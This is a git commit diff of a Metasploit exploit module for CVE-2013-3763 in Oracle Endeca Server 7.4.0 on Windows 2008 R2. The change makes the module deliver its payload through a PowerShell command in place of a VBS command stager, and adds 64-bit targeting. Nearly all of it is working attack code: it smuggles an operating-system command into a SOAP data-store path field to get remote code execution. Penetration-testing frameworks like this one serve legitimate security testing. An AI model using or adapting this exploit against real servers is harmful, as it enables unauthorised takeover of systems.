Switch to powershell to exec payload
jvazquez-r7
parent
965e2d88fe
commit
ad214da3de
|
|
@ -11,7 +11,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
include Msf::Exploit::CmdStagerVBS
|
||||
include Msf::Exploit::Powershell
|
||||
|
||||
def initialize
|
||||
super(
|
||||
|
|
@ -29,7 +29,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'juan vazquez' # Metasploit module
|
||||
],
|
||||
'Platform' => 'win',
|
||||
'Arch' => ARCH_X86, # Using ARCH_X86 because it's compatible with CmdStagerVBS
|
||||
'Arch' => [ ARCH_X86_64, ARCH_X86 ],
|
||||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2013-3763' ],
|
||||
|
|
@ -40,7 +40,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
],
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Oracle Endeca Server 7.4.0 / Microsoft Windows 2008 R2', { } ]
|
||||
[ 'Oracle Endeca Server 7.4.0 / Microsoft Windows 2008 R2 64 bits', { } ]
|
||||
],
|
||||
'DefaultTarget' => 0,
|
||||
'Privileged' => false,
|
||||
|
|
@ -131,21 +131,24 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
def exploit
|
||||
print_status("#{peer} - Exploiting by deploying a VBS CMD Stager...")
|
||||
# Windows 2008 Command Prompt Max Length is 8191
|
||||
execute_cmdstager({ :delay => 0.35, :linemax => 7500 })
|
||||
command = cmd_psh_payload(payload.encoded)
|
||||
if command.length > 8000
|
||||
# Windows 2008 Command Prompt Max Length is 8191
|
||||
fail_with(Failure::BadConfig, "#{peer} - The selected paylod is too long to execute through powershell in one command")
|
||||
end
|
||||
print_status("#{peer} - Exploiting through Powershell...")
|
||||
execute_command(command)
|
||||
end
|
||||
|
||||
def execute_command(cmd, opts)
|
||||
# To delete spaces priors to crlf lines since it is an observed behavior on Win 2008
|
||||
cmd.gsub!(/data = Replace\(data, vbCrLf, ""\)/, "data = Replace(data, \" \" + vbCrLf, \"\") : data = Replace(data, vbCrLf, \"\")")
|
||||
def execute_command(cmd)
|
||||
# HTML encode ampersands so SOAP is correctly interpreted
|
||||
cmd.gsub!(/&/, "&")
|
||||
injection = "c:\\"& #{cmd} &""
|
||||
exploit_data = create_data_store_soap(rand_text_alpha(4), injection)
|
||||
begin
|
||||
res = send_request_soap(exploit_data)
|
||||
if res.nil? or res.code != 500 or res.body !~ /Error creating data files at/
|
||||
if res.nil? or res.code != 500 or ( res.body !~ /Error creating data files at/ and res.body !~ /Data files don't exist/ )
|
||||
print_status("#{res.code}\n#{res.body}") if res
|
||||
fail_with(Failure::UnexpectedReply, "#{peer} - Unable to execute the CMD Stager")
|
||||
end
|
||||
rescue ::Rex::ConnectionError
|
||||
|
|
|
|||
Loading…
Reference in New Issue